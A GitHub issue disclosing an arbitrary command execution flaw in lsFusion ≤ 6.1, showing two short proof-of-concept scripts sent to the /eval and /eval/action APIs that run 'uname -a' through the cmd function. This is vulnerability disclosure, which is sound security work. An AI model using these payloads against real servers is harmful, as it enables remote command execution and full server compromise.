Skip to content

Vulnerability: Arbitrary Command Execution in lsFusion ≤ 6.1 #1546

Open
Open
Vulnerability: Arbitrary Command Execution in lsFusion ≤ 6.1#1546
@R1ckyZ

Description

@R1ckyZ
R1ckyZ
opened on Nov 5, 2025

BUG_Author: R1ckyZ

Affected Version: lsFusion ≤ 6.1

Vendor: lsfusion GitHub Repository

Software: lsfusion

Vulnerability Files:

  • server/src/main/java/lsfusion/server/physics/admin/interpreter/action/RunCommandAction.java

Description:

The client accesses the server via the /eval/action and /eval APIs. An authorized user can pass a script parameter to execute scripts. The server exposes functions for command execution, file reading, and file writing. An authorized user can therefore execute arbitrary commands, effectively gaining full access to the server.

Image Image

Proof of Concept:

  1. Access the API /eval/action and pass in the following script value:
{cmd('uname -a', NULL, NULL, TRUE ); }
EXPORT FROM cmdOut[]();
Image
  1. Alternatively, access the API /eval and pass in the following script value:
run() {
cmd('uname -a', NULL, NULL, TRUE );
EXPORT FROM cmdOut[]();
}
Image

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Type

    No type

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions